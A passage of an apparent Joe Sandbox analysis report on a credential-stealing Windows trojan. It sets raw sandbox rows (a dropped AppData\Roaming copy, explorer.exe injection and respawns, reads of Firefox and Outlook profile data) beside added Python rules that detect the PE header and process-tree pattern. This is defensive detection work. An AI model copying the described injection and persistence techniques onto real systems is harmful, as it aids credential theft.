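    [(b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
     (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
    IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE,
    import_size=0x80)

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT), ("normal", NORMAL)):
        print(label, static_findings(blob) or ["no static findings"])
```

On a real file the same three fields are what pefile exposes as FILE_HEADER.Characteristics, OPTIONAL_HEADER.DATA_DIRECTORY[1].Size and each section's Characteristics. None of the three is proof of malice on its own: packers and shellcode-style loaders routinely ship with an empty import table, and a writable .text is the usual footprint of a stub that decrypts its own code in place. Read together with the in-memory Yara hits above they corroborate the verdict rather than establish it.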
Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winEXE@21/15@1/1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0083274A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,FindCloseChangeNotification
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\rrrrcve
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7716
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\A711.tmp
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AA70.tmp.6.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | ReversingLabs: Detection: 55%
Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Virustotal: Detection: 57%
Source: unknown | Process created: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe "C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\rrrrcve C:\Users\user\AppData\Roaming\rrrrcve
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7716 -s 700
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
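The process tree above is the host-side trace of the injection: the injected 64-bit shell repeatedly launches argument-less copies of explorer.exe (both the 64-bit one and the 32-bit one from SysWOW64), the dropped copy runs from AppData\Roaming under a name with no extension (rrrrcve), and one explorer instance crashes into WerFault.exe. The following is an added example, not part of the Joe Sandbox report: three process-creation rules run over events constructed from the rows above in a Sysmon-like shape (image, parent image, command line) plus one benign control event. The event layout, the rule set and the message wording are my own assumptions.

```python
"""Process-tree rules for the spawn pattern this report records.

Added example, not part of the Joe Sandbox report. The events below are
constructed from the "Process created" rows of the report in a Sysmon-like
shape (image, parent_image, cmdline); the rule set and its wording are mine.
"""
import ntpath


def _is_explorer(path):
    return ntpath.basename(path).lower() == "explorer.exe"


def _has_arguments(ev):
    """True when the command line carries more than the executable path itself."""
    cmd = ev["cmdline"].strip().strip('"')
    return cmd != "" and cmd.lower() != ev["image"].lower()


def rule_explorer_spawns_explorer(ev):
    """The shell does not normally start another explorer.exe without arguments,
    and a 32-bit (SysWOW64) explorer.exe on a 64-bit host has no legitimate use."""
    if _is_explorer(ev["parent_image"]) and _is_explorer(ev["image"]) and not _has_arguments(ev):
        arch = "32-bit SysWOW64" if "\\syswow64\\" in ev["image"].lower() else "64-bit"
        return f"explorer.exe spawned an argument-less {arch} explorer.exe"
    return None


def rule_roaming_without_extension(ev):
    """The dropped copy 'rrrrcve' lives in AppData\\Roaming and has no extension."""
    image = ev["image"]
    if "\\appdata\\roaming\\" in image.lower() and not ntpath.splitext(image)[1]:
        return f"executable without extension under AppData\\Roaming: {image}"
    return None


def rule_werfault_for_shell(ev):
    """WerFault.exe started for explorer.exe: the shell crashed, here right after
    foreign code was injected into it. Informational on its own."""
    if ntpath.basename(ev["image"]).lower() == "werfault.exe" and _is_explorer(ev["parent_image"]):
        return f"WerFault.exe invoked for explorer.exe ({ev['cmdline']})"
    return None


RULES = (rule_explorer_spawns_explorer, rule_roaming_without_extension, rule_werfault_for_shell)


def evaluate(events):
    """Return (rule name, image, message) for every event/rule pair that fires."""
    hits = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((rule.__name__, ev["image"], msg))
    return hits


SAMPLE = r"C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe"

# Constructed events, taken from the report's process tree; parent "" = unknown.
EVENTS = [
    {"image": SAMPLE, "parent_image": "", "cmdline": '"' + SAMPLE + '"'},
    {"image": r"C:\Users\user\AppData\Roaming\rrrrcve", "parent_image": "",
     "cmdline": r"C:\Users\user\AppData\Roaming\rrrrcve"},
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\explorer.exe"},
    {"image": r"C:\Windows\explorer.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\WerFault.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\system32\WerFault.exe -u -p 7716 -s 700"},
    # benign control (constructed): the shell launching an ordinary program
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
]

if __name__ == "__main__":
    for name, image, msg in evaluate(EVENTS):
        print(f"{name:32} {msg}")
```

Weight the three differently: a SysWOW64 explorer.exe child is the strongest signal in this tree, while a 64-bit explorer.exe starting another argument-less 64-bit explorer.exe also happens legitimately when the "Launch folder windows in a separate process" option is enabled, and WerFault.exe for the shell is only interesting because of what precedes it. The extension-less binary in AppData\Roaming is the persistence artefact to hunt for across the fleet.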
Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\rrrrcve | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
                    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
                    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
                    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
                    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
                    Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
                    Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 6_2_03002198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary, 6_2_03002198
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | Code function: 0_2_0040134A pushfd ; retf 0_2_00401353
